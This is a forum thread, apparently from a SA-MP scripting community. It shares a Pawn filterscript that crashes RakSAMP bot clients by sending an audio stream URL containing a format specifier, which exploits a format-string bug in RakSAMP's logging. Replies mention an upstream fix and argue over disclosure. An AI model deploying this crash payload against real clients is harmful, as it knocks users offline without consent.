[SlowARG]

RakCrash
Snippet for crashing RakSAMP players.

••• Description •••
There's a little bug in RakSAMP so it's possible to crash RakSAMP players by abusing null strings.

••• How? •••
RakSAMP crashes when passing string format specifier in Log() function.
Since SA-MP client doesn't crash passing null string inside audio stream, we can abuse this to crash invalid clients such as RakSAMP.

••• Downloads •••

PHP Code:

#include <a_samp>
#define FILTERSCRIPT
#define _RAKCRASH_HIDE // Hide "%s" in "real URL". 
/********************************************************************************
* How it works?                                                                    *
* RakSAMP crashes when passing string format specifier in Log() function.        *
* File: netrpc.cpp on ScrPlayAudioStream function:                                *
* Log("[AUDIO_STREAM] %s", szURL); --> if szURL contains %s, it will crash        *
* Since SA-MP client doesn't crash passing null string inside audio stream        *
* we can abuse this to crash invalid clients such as RakSAMP.                    *
*********************************************************************************/
public OnPlayerConnect(playerid)
{
#if defined _RAKCRASH_HIDE
    PlayAudioStreamForPlayer(playerid, "https://dl.dropboxusercontent.com/s/ac4oqi08gtiuzb0/intro%samp.mp3?dl=0"); // you can use any url containing %s or %20s or something else. It doesn't need to be a valid URL.
#else
    PlayAudioStreamForPlayer(playerid, "%s");
#endif
    StopAudioStreamForPlayer(playerid);
    return 1;
} 


Greetings!
Nobody.

[brauf]

https://github.com/P3ti/RakSAMP/pull/23

didn't live long.

[KinderClans]

Quote:

Originally Posted by brauf https://github.com/P3ti/RakSAMP/pull/23 didn't live long.

lmao

Died before borning.

[SlowARG]

It'll live for a long because RakSAMP hasn't been updated for a long time. Anyway lot of "users" don't know about new RakSAMP updates so it'll be functional like old RakCrash method.

Best regards.

[iAmir]

Awesome, you release a code that can crash RakSAMP clients, then you create a PR in RakSAMP's repo and tell'em about your own release RakCrash and attempt to fix it.
pathetic...

[SlowARG]

Quote:

Originally Posted by iAmir Awesome, you release a code that can crash RakSAMP clients, then you create a PR in RakSAMP's repo and tell'em about your own release RakCrash and attempt to fix it. pathetic...

Calm down dude...
I did a PR on GitHub before this post.
When someone finds a vulnerability in any software, such as Windows OS, first fix the vuln and then release a PoC code.
So I fixed the bug and then release the PoC.

I don't want rep or similar bullshit. I released this snippet to combat script kiddies that can't compile RakSAMP by themselves.

So if you will not comment any constructive message then don't fricking disturb.

Again, calm down.

[rorrobryan]

Thanks!